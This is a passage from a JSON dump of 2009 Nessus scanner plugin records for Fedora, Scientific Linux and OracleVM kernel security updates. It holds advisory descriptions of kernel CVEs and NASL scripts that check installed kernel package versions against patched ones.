(#526546)\n\n - Tue Oct 6 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-75\n\n - x86: Don't leak 64-bit reg contents to 32-bit tasks.\n\n - Tue Oct 6 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-74\n\n[plus 194 lines in the Changelog]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=529626\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=530283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=530490\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=530515\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-November/030674.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c4aae2b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(189, 310, 362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"kernel-2.6.30.9-96.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:40", "bulletinFamily": "scanner", "description": "Update to kernel 2.6.27.38:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.38\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-24T00:00:00", "id": "FEDORA_2009-11038.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42402", "published": "2009-11-06T00:00:00", "title": "Fedora 10 : kernel-2.6.27.38-170.2.113.fc10 (2009-11038)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-11038.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42402);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/12/24 10:14:26\");\n\n script_cve_id(\"CVE-2009-3547\", \"CVE-2009-3612\", \"CVE-2009-3620\", \"CVE-2009-3621\", \"CVE-2009-3638\");\n script_bugtraq_id(36723, 36803, 36824, 36827, 36901);\n script_xref(name:\"FEDORA\", value:\"2009-11038\");\n\n script_name(english:\"Fedora 10 : kernel-2.6.27.38-170.2.113.fc10 (2009-11038)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to kernel 2.6.27.38:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.38\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.38\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?395e6259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=528868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=529597\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=529626\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=530490\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=530515\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-November/030686.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88d0a7ab\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 189, 200, 362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"kernel-2.6.27.38-170.2.113.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:37", "bulletinFamily": "scanner", "description": "CVE-2009-2695 kernel: SELinux and mmap_min_addr\n\nCVE-2009-3228 kernel: tc: uninitialised kernel memory leak\n\nCVE-2009-3286 kernel: O_EXCL creates on NFSv4 are broken\n\nCVE-2009-2908 kernel ecryptfs NULL pointer dereference\n\nCVE-2009-3613 kernel: flood ping cause out-of-iommu error and panic when mtu larger than 1500\n\nCVE-2009-3547 kernel: fs: pipe.c NULL pointer dereference\n\nSecurity fixes :\n\n - a system with SELinux enforced was more permissive in allowing local users in the unconfined_t domain to map low memory areas even if the mmap_min_addr restriction was enabled. This could aid in the local exploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n\n - a NULL pointer dereference flaw was found in the eCryptfs implementation in the Linux kernel. A local attacker could use this flaw to cause a local denial of service or escalate their privileges. (CVE-2009-2908, Important)\n\n - a flaw was found in the NFSv4 implementation. The kernel would do an unnecessary permission check after creating a file. This check would usually fail and leave the file with the permission bits set to random values. Note:\n This is a server-side only issue. (CVE-2009-3286, Important)\n\n - a NULL pointer dereference flaw was found in each of the following functions in the Linux kernel:\n pipe_read_open(), pipe_write_open(), and pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could be released by other processes before it is used to update the pipe's reader and writer counters. This could lead to a local denial of service or privilege escalation. (CVE-2009-3547, Important)\n\n - a flaw was found in the Realtek r8169 Ethernet driver in the Linux kernel. pci_unmap_single() presented a memory leak that could lead to IOMMU space exhaustion and a system crash. An attacker on the local network could abuse this flaw by using jumbo frames for large amounts of network traffic. (CVE-2009-3613, Important)\n\n - missing initialization flaws were found in the Linux kernel. Padding data in several core network structures was not initialized properly before being sent to user-space. These flaws could lead to information leaks.\n (CVE-2009-3228, Moderate)\n\nBug fixes :\n\n - with network bonding in the 'balance-tlb' or 'balance-alb' mode, the primary setting for the primary slave device was lost when said device was brought down.\n Bringing the slave back up did not restore the primary setting. (BZ#517971)\n\n - some faulty serial device hardware caused systems running the kernel-xen kernel to take a very long time to boot. (BZ#524153)\n\n - a caching bug in nfs_readdir() may have caused NFS clients to see duplicate files or not see all files in a directory. (BZ#526960)\n\n - the RHSA-2009:1243 update removed the mpt_msi_enable option, preventing certain scripts from running. This update adds the option back. (BZ#526963)\n\n - an iptables rule with the recent module and a hit count value greater than the ip_pkt_list_tot parameter (the default is 20), did not have any effect over packets, as the hit count could not be reached. (BZ#527434)\n\n - a check has been added to the IPv4 code to make sure that rt is not NULL, to help prevent future bugs in functions that call ip_append_data() from being exploitable. (BZ#527436)\n\n - a kernel panic occurred in certain conditions after reconfiguring a tape drive's block size. (BZ#528133)\n\n - when using the Linux Virtual Server (LVS) in a master and backup configuration, and propagating active connections on the master to the backup, the connection timeout value on the backup was hard-coded to 180 seconds, meaning connection information on the backup was soon lost. This could prevent the successful failover of connections. The timeout value can now be set via 'ipvsadm --set'. (BZ#528645)\n\n - a bug in nfs4_do_open_expired() could have caused the reclaimer thread on an NFSv4 client to enter an infinite loop. (BZ#529162)\n\n - MSI interrupts may not have been delivered for r8169 based network cards that have MSI interrupts enabled.\n This bug only affected certain systems. (BZ#529366)\n\nThe system must be rebooted for this update to take effect.\n\nNote1: Due to the fuse kernel module now being part of the kernel, we are updating fuse on the older releases to match the fuse that was released by The Upstream Vendor.\n\nNote2: kernel-module-openafs for SL 50-53 is for openafs 1.4.7, for SL 54 it is for openafs 1.4.11\n\nNote3: xfs is now part of the kernel in x86_64. Because of this there is no kernel-module-xfs for x86_64.\n\nNote4: ipw3945 support has been changed to iwlwifi3945 in SL 54, and is in the kernel. Because of this there is no kernel-module-ipw3945 for SL54.\n\nNote5: Support for the Atheros chipset in now in the kernel. We are not sure if the infrastructure is in place for SL 50-53, so we are still providing the madwifi kernel modules for SL 50-53.", "modified": "2019-01-02T00:00:00", "id": "SL_20091103_KERNEL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=65044", "published": "2013-03-06T00:00:00", "title": "Scientific Linux Security Update : kernel on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65044);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/01/02 10:36:43\");\n\n script_cve_id(\"CVE-2009-2695\", \"CVE-2009-2908\", \"CVE-2009-3228\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3613\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2009-2695 kernel: SELinux and mmap_min_addr\n\nCVE-2009-3228 kernel: tc: uninitialised kernel memory leak\n\nCVE-2009-3286 kernel: O_EXCL creates on NFSv4 are broken\n\nCVE-2009-2908 kernel ecryptfs NULL pointer dereference\n\nCVE-2009-3613 kernel: flood ping cause out-of-iommu error and panic\nwhen mtu larger than 1500\n\nCVE-2009-3547 kernel: fs: pipe.c NULL pointer dereference\n\nSecurity fixes :\n\n - a system with SELinux enforced was more permissive in\n allowing local users in the unconfined_t domain to map\n low memory areas even if the mmap_min_addr restriction\n was enabled. This could aid in the local exploitation of\n NULL pointer dereference bugs. (CVE-2009-2695,\n Important)\n\n - a NULL pointer dereference flaw was found in the\n eCryptfs implementation in the Linux kernel. A local\n attacker could use this flaw to cause a local denial of\n service or escalate their privileges. (CVE-2009-2908,\n Important)\n\n - a flaw was found in the NFSv4 implementation. The kernel\n would do an unnecessary permission check after creating\n a file. This check would usually fail and leave the file\n with the permission bits set to random values. Note:\n This is a server-side only issue. (CVE-2009-3286,\n Important)\n\n - a NULL pointer dereference flaw was found in each of the\n following functions in the Linux kernel:\n pipe_read_open(), pipe_write_open(), and\n pipe_rdwr_open(). When the mutex lock is not held, the\n i_pipe pointer could be released by other processes\n before it is used to update the pipe's reader and writer\n counters. This could lead to a local denial of service\n or privilege escalation. (CVE-2009-3547, Important)\n\n - a flaw was found in the Realtek r8169 Ethernet driver in\n the Linux kernel. pci_unmap_single() presented a memory\n leak that could lead to IOMMU space exhaustion and a\n system crash. An attacker on the local network could\n abuse this flaw by using jumbo frames for large amounts\n of network traffic. (CVE-2009-3613, Important)\n\n - missing initialization flaws were found in the Linux\n kernel. Padding data in several core network structures\n was not initialized properly before being sent to\n user-space. These flaws could lead to information leaks.\n (CVE-2009-3228, Moderate)\n\nBug fixes :\n\n - with network bonding in the 'balance-tlb' or\n 'balance-alb' mode, the primary setting for the primary\n slave device was lost when said device was brought down.\n Bringing the slave back up did not restore the primary\n setting. (BZ#517971)\n\n - some faulty serial device hardware caused systems\n running the kernel-xen kernel to take a very long time\n to boot. (BZ#524153)\n\n - a caching bug in nfs_readdir() may have caused NFS\n clients to see duplicate files or not see all files in a\n directory. (BZ#526960)\n\n - the RHSA-2009:1243 update removed the mpt_msi_enable\n option, preventing certain scripts from running. This\n update adds the option back. (BZ#526963)\n\n - an iptables rule with the recent module and a hit count\n value greater than the ip_pkt_list_tot parameter (the\n default is 20), did not have any effect over packets, as\n the hit count could not be reached. (BZ#527434)\n\n - a check has been added to the IPv4 code to make sure\n that rt is not NULL, to help prevent future bugs in\n functions that call ip_append_data() from being\n exploitable. (BZ#527436)\n\n - a kernel panic occurred in certain conditions after\n reconfiguring a tape drive's block size. (BZ#528133)\n\n - when using the Linux Virtual Server (LVS) in a master\n and backup configuration, and propagating active\n connections on the master to the backup, the connection\n timeout value on the backup was hard-coded to 180\n seconds, meaning connection information on the backup\n was soon lost. This could prevent the successful\n failover of connections. The timeout value can now be\n set via 'ipvsadm --set'. (BZ#528645)\n\n - a bug in nfs4_do_open_expired() could have caused the\n reclaimer thread on an NFSv4 client to enter an infinite\n loop. (BZ#529162)\n\n - MSI interrupts may not have been delivered for r8169\n based network cards that have MSI interrupts enabled.\n This bug only affected certain systems. (BZ#529366)\n\nThe system must be rebooted for this update to take effect.\n\nNote1: Due to the fuse kernel module now being part of the kernel, we\nare updating fuse on the older releases to match the fuse that was\nreleased by The Upstream Vendor.\n\nNote2: kernel-module-openafs for SL 50-53 is for openafs 1.4.7, for SL\n54 it is for openafs 1.4.11\n\nNote3: xfs is now part of the kernel in x86_64. Because of this there\nis no kernel-module-xfs for x86_64.\n\nNote4: ipw3945 support has been changed to iwlwifi3945 in SL 54, and\nis in the kernel. Because of this there is no kernel-module-ipw3945\nfor SL54.\n\nNote5: Support for the Atheros chipset in now in the kernel. We are\nnot sure if the infrastructure is in place for SL 50-53, so we are\nstill providing the madwifi kernel modules for SL 50-53.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=517971\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=524153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=526960\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=526963\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=527434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=527436\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=528133\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=528645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=529162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=529366\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0911&L=scientific-linux-errata&T=0&P=722\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bdbde572\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 200, 264, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"kernel-2.6.18-164.6.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-164.6.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-164.6.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-2.6.18-164.6.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-devel-2.6.18-164.6.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-devel-2.6.18-164.6.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-doc-2.6.18-164.6.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-headers-2.6.18-164.6.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-2.6.18-164.6.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-devel-2.6.18-164.6.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:52", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - [security] require root for mmap_min_addr (Eric Paris) [518142 518143] (CVE-2009-2695)\n\n - [md] prevent crash when accessing suspend_* sysfs attr (Danny Feng) [518135 518136] (CVE-2009-2849)\n\n - [nfs] knfsd: fix NFSv4 O_EXCL creates (Jeff Layton) [522163 524521] (CVE-2009-3286)\n\n - [fs] fix pipe null pointer dereference (Jeff Moyer) [530938 530939] (CVE-2009-3547)\n\n - [net] r8169: balance pci_map/unmap pair, use hw padding (Ivan Vecera) [529143 515857] (CVE-2009-3613)\n\n - [net] tc: fix uninitialized kernel memory leak (Jiri Pirko) [520994 520863](CVE-2009-3228)", "modified": "2018-07-24T00:00:00", "id": "ORACLEVM_OVMSA-2009-0033.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79470", "published": "2014-11-26T00:00:00", "title": "OracleVM 2.2 : kernel (OVMSA-2009-0033)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2009-0033.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79470);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2009-2695\", \"CVE-2009-2849\", \"CVE-2009-3228\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3613\");\n script_bugtraq_id(36304, 36472, 36706, 36901);\n\n script_name(english:\"OracleVM 2.2 : kernel (OVMSA-2009-0033)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - [security] require root for mmap_min_addr (Eric Paris)\n [518142 518143] (CVE-2009-2695)\n\n - [md] prevent crash when accessing suspend_* sysfs attr\n (Danny Feng) [518135 518136] (CVE-2009-2849)\n\n - [nfs] knfsd: fix NFSv4 O_EXCL creates (Jeff Layton)\n [522163 524521] (CVE-2009-3286)\n\n - [fs] fix pipe null pointer dereference (Jeff Moyer)\n [530938 530939] (CVE-2009-3547)\n\n - [net] r8169: balance pci_map/unmap pair, use hw padding\n (Ivan Vecera) [529143 515857] (CVE-2009-3613)\n\n - [net] tc: fix uninitialized kernel memory leak (Jiri\n Pirko) [520994 520863](CVE-2009-3228)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2009-November/000039.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c6f5df51\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 200, 264, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-ovs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-ovs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-2.6.18-128.2.1.4.12.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-devel-2.6.18-128.2.1.4.12.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", 